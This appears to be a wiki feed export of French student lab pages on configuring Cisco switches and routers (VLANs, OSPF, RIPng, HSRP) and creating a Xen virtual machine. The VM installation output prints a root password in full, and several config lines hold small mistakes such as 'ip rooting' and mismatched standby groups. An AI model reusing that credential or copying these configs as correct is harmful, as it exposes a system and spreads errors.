{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E306 !! E304&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/1 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 1/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 5/3 &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Gigabitethernet 2/2 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Ge 5/1(E306) &amp;amp; Ge 1/1(E304) &lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Ge 1/1(E306) &amp;amp; Ge 2/2(E304) &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   ip routing&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.254   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.6 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface BDI1&lt;br /&gt;
   ip address 10.60.0.253 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   int vlan 130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248         &lt;br /&gt;
   ipv6 address fe80::2 link-local                  &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 rip tpima2a5 enable                        &lt;br /&gt;
   exit&lt;br /&gt;
   ip rooting&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.253   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
   &lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface Vlan1&lt;br /&gt;
   ip address 10.60.0.253 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
    &lt;br /&gt;
   interface Vlan2&lt;br /&gt;
   ip address 10.60.1.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 2 ip 10.60.1.252&lt;br /&gt;
   standby 2 preempt&lt;br /&gt;
   exit&lt;br /&gt;
     &lt;br /&gt;
   interface Vlan3&lt;br /&gt;
   ip address 10.60.2.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252&lt;br /&gt;
   standby 3 preempt&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface Vlan4&lt;br /&gt;
   ip address 10.60.3.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252&lt;br /&gt;
   standby 4 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan5&lt;br /&gt;
   ip address 10.60.4.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252&lt;br /&gt;
   standby 5 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan6&lt;br /&gt;
   ip address 10.60.5.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252&lt;br /&gt;
   standby 6 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan7&lt;br /&gt;
   ip address 10.60.6.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2201:660:4401:60B7::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2201:660:4401:60B7::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 10.60.6.252&lt;br /&gt;
   standby 7 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan42&lt;br /&gt;
   ip address 193.48.57.174 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 42 ip 193.48.57.172&lt;br /&gt;
   standby 42 preempt&lt;br /&gt;
   exit&lt;br /&gt;
          &lt;br /&gt;
   interface Vlan130&lt;br /&gt;
   ip address 192.168.222.2 255.255.255.248&lt;br /&gt;
   ipv6 address FE80::42:3 link-local&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51401</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51401"/>
				<updated>2019-11-29T11:40:47Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* Modification de /etc/bind/named.conf.options */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation,on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     root@cordouan:~#lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
